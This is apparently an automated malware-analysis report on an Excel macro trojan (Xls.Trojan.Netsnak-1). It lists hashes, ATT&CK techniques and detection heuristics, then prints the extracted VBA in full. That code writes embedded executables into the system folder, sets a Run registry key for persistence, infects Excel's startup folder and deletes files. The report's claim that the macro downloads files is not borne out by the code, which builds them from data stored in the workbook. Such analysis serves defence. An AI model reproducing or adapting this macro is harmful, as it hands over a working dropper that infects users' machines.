Xls.Trojan.Netsnak-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 0f13d5a8f48bd2c9…

MALICIOUS

Office (OLE)

331.5 KB Created: 1999-09-09 17:30:14 Authoring application: Microsoft Excel First seen: 2015-10-02
MD5: c578de05c3c150ea9cd2b510a89b4610 SHA-1: f2b8879787d8c332b55e200a872c35d51aea0a53 SHA-256: 0f13d5a8f48bd2c98d3a5aae78ed57ae9af7ef60d58118a7d0014a52f0cf5e73
220 Risk Score

Malware Insights

Xls.Trojan.Netsnak-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File Execution: Malicious File

The file contains VBA macros that leverage WScript.Shell and scripting.filesystemobject to create directories and write executable files to the user's startup folder. The macro attempts to download and save files named 'winupdsv.exe' and 'sfcea.exe' to the startup directory, likely to execute a second-stage payload. The ClamAV detection name 'Xls.Trojan.Netsnak-1' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Xls.Trojan.Netsnak-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Netsnak-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("scripting.filesystemobject")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8110 bytes
SHA-256: 20aab44873ff63f9c9d06e6b25591175208e6b9cab25da5aeccf715e94f650a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Module1"
                                                                                                                                
Attribute VB_Name = "Module2"
Private Sub addsum()
Dim buf As Byte
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
fso.deletefile "c:\C0MS.sys"
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub

Attribute VB_Name = "Module3"
Private Sub addsum()
Dim buf As Byte
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
fso.deletefile "c:\C0MS.sys"
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub

Attribute VB_Name = "Module4"
Private Sub addsum()
Dim buf As Byte
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
fso.deletefile "c:\C0MS.sys"
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.